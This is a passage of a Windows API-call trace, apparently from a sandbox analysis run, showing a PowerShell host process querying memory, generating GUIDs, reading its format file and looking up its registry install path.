	[0412.541] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.541] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.541] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.541] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.542] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.542] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.542] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.542] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.542] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.542] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.543] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.543] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.543] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.543] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.543] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.543] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.543] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.544] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x13b35b73, Data2=0x792d, Data3=0x4100, Data4=([0]=0x8c, [1]=0x64, [2]=0x23, [3]=0x8, [4]=0x7b, [5]=0x80, [6]=0x5b, [7]=0x18))) returned 0x0
	[0412.544] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.544] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.544] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.544] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.545] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.545] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.545] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.545] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.545] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.545] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.545] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.546] VirtualQuery (in: lpAddress=0xcb6a0, lpBuffer=0xcc560, dwLength=0x30 | out: lpBuffer=0xcc560*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.546] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.546] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.546] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.546] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.546] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x4546a251, Data2=0xa3fb, Data3=0x44dd, Data4=([0]=0xb5, [1]=0x71, [2]=0x31, [3]=0x9d, [4]=0xc3, [5]=0x4b, [6]=0xf9, [7]=0x1))) returned 0x0
	[0412.546] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xd108a6a1, Data2=0xb30d, Data3=0x426d, Data4=([0]=0xb9, [1]=0xf0, [2]=0xc9, [3]=0xff, [4]=0xec, [5]=0xc9, [6]=0x4a, [7]=0xbb))) returned 0x0
	[0412.546] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xd40e810c, Data2=0x5b50, Data3=0x4210, Data4=([0]=0x82, [1]=0x1e, [2]=0xc0, [3]=0x73, [4]=0xa6, [5]=0x4f, [6]=0x3f, [7]=0xde))) returned 0x0
	[0412.547] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x3f9625f3, Data2=0x3e65, Data3=0x4f7b, Data4=([0]=0xbd, [1]=0x4, [2]=0x1b, [3]=0x74, [4]=0x55, [5]=0x5, [6]=0x90, [7]=0xa9))) returned 0x0
	[0412.547] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x7982649a, Data2=0x8662, Data3=0x4874, Data4=([0]=0xa6, [1]=0x63, [2]=0x0, [3]=0xb1, [4]=0xa, [5]=0x1b, [6]=0xf1, [7]=0xa8))) returned 0x0
	[0412.547] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.547] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.547] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xd7b3197c, Data2=0x8a51, Data3=0x4836, Data4=([0]=0xba, [1]=0x85, [2]=0x8a, [3]=0x91, [4]=0xd6, [5]=0x6f, [6]=0x79, [7]=0x39))) returned 0x0
	[0412.547] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x933b1f85, Data2=0xa59d, Data3=0x47f2, Data4=([0]=0xab, [1]=0x5a, [2]=0x59, [3]=0xe0, [4]=0x9c, [5]=0x82, [6]=0xe8, [7]=0xf2))) returned 0x0
	[0412.548] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xe0d32464, Data2=0x9305, Data3=0x4f20, Data4=([0]=0x8d, [1]=0x3, [2]=0x70, [3]=0x2, [4]=0xc6, [5]=0x68, [6]=0x66, [7]=0x47))) returned 0x0
	[0412.548] SetErrorMode (uMode=0x1) returned 0x1
	[0412.548] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0412.548] GetFileType (hFile=0x2fc) returned 0x1
	[0412.548] SetErrorMode (uMode=0x1) returned 0x1
	[0412.548] GetFileType (hFile=0x2fc) returned 0x1
	[0412.548] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.549] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.549] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.550] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.550] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.550] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.550] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.550] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.551] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.551] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.552] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.552] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.552] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.552] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.553] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.553] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.553] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.554] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.555] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.555] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.555] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.555] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0xe67, lpOverlapped=0x0) returned 1
	[0412.555] ReadFile (in: hFile=0x2fc, lpBuffer=0x307cd4f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307cd4f*, lpNumberOfBytesRead=0xccf98*=0x0, lpOverlapped=0x0) returned 1
	[0412.556] ReadFile (in: hFile=0x2fc, lpBuffer=0x307d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x307d780*, lpNumberOfBytesRead=0xccf98*=0x0, lpOverlapped=0x0) returned 1
	[0412.556] SetErrorMode (uMode=0x1) returned 0x1
	[0412.556] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf40 | out: lpFileInformation=0xccf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0412.556] SetErrorMode (uMode=0x1) returned 0x1
	[0412.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0412.556] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd028 | out: phkResult=0xcd028*=0x2fc) returned 0x0
	[0412.556] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfac, lpData=0x0, lpcbData=0xccfa8*=0x0 | out: lpType=0xccfac*=0x1, lpData=0x0, lpcbData=0xccfa8*=0x56) returned 0x0
	[0412.556] CoTaskMemAlloc (cb=0x5a) returned 0x1ffce0
	[0412.556] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf7c, lpData=0x1ffce0, lpcbData=0xccf78*=0x56 | out: lpType=0xccf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf78*=0x56) returned 0x0
	[0412.556] CoTaskMemFree (pv=0x1ffce0) 
	[0412.557] RegCloseKey (hKey=0x2fc) returned 0x0
	[0412.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0412.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0412.558] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x160d960c, Data2=0x392e, Data3=0x4d42, Data4=([0]=0xa0, [1]=0xf, [2]=0xa6, [3]=0x87, [4]=0x49, [5]=0x9c, [6]=0xa9, [7]=0xda))) returned 0x0
	[0412.558] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xff3a0f9f, Data2=0x4be2, Data3=0x462b, Data4=([0]=0x94, [1]=0xcc, [2]=0xca, [3]=0x66, [4]=0xd6, [5]=0xdf, [6]=0x36, [7]=0x90))) returned 0x0
	[0412.558] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x2e17fe60, Data2=0xd461, Data3=0x420f, Data4=([0]=0xa1, [1]=0xf5, [2]=0x28, [3]=0xca, [4]=0x1c, [5]=0x40, [6]=0xe4, [7]=0x32))) returned 0x0
	[0412.558] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x93bd3b30, Data2=0xf2d, Data3=0x4a65, Data4=([0]=0x87, [1]=0x2d, [2]=0xdd, [3]=0xb8, [4]=0x26, [5]=0x9e, [6]=0xd, [7]=0x17))) returned 0x0
	[0412.558] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x5a88f1c9, Data2=0xdd78, Data3=0x49e3, Data4=([0]=0x9d, [1]=0x57, [2]=0xd8, [3]=0xab, [4]=0x46, [5]=0x2f, [6]=0xbe, [7]=0x45))) returned 0x0
	[0412.559] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xa9c0e2fb, Data2=0x39eb, Data3=0x4b5e, Data4=([0]=0xaa, [1]=0x9c, [2]=0xd6, [3]=0xca, [4]=0x60, [5]=0xff, [6]=0x10, [7]=0x5f))) returned 0x0
	[0412.559] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x29005e28, Data2=0xa82e, Data3=0x4a4c, Data4=([0]=0x90, [1]=0x9, [2]=0xc1, [3]=0x23, [4]=0x5c, [5]=0x81, [6]=0xb, [7]=0x0))) returned 0x0
	[0412.559] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.559] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xd58cbbdf, Data2=0x83e0, Data3=0x4664, Data4=([0]=0xae, [1]=0xc8, [2]=0x15, [3]=0x78, [4]=0x31, [5]=0x18, [6]=0xe5, [7]=0x28))) returned 0x0
	[0412.559] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x6fa8a3e5, Data2=0x71b, Data3=0x4d92, Data4=([0]=0xb5, [1]=0x61, [2]=0x2, [3]=0xf, [4]=0x2, [5]=0x36, [6]=0xbe, [7]=0x5b))) returned 0x0
	[0412.559] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xfd97545a, Data2=0xe20a, Data3=0x42b8, Data4=([0]=0xbb, [1]=0x8, [2]=0x7a, [3]=0x47, [4]=0x42, [5]=0x6f, [6]=0xd0, [7]=0x51))) returned 0x0
	[0412.559] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xd206f20c, Data2=0xdcd2, Data3=0x4cda, Data4=([0]=0x82, [1]=0x29, [2]=0xe4, [3]=0xfe, [4]=0x67, [5]=0x7f, [6]=0x53, [7]=0x22))) returned 0x0
	[0412.559] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x88cbb264, Data2=0x805f, Data3=0x453f, Data4=([0]=0x90, [1]=0x53, [2]=0x43, [3]=0x39, [4]=0xcd, [5]=0xf7, [6]=0x88, [7]=0xea))) returned 0x0
	[0412.559] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x8d2c33b9, Data2=0xbc46, Data3=0x474c, Data4=([0]=0xb6, [1]=0xa9, [2]=0xea, [3]=0x6f, [4]=0x5c, [5]=0x33, [6]=0xab, [7]=0xed))) returned 0x0
